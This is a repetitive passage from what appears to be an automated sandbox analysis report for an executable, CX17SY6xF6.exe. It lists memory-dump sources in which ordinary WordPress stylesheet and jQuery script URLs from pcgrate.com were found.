CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=899328ee298e
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/custom.css?ver=899328ee298e
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/media.css?ver=899328ee298e
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/post-type-dynamic.css?ver=899328ee298e
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/css/dist/block-library/style.min.css?ver=5.8
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/core.min.js?ver=1.12.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-blind.min.js?ver=1.12.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-fold.min.js?ver=1.12.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-highlight.min.js?ver=1.12.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-slide.min.js?ver=1.12.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 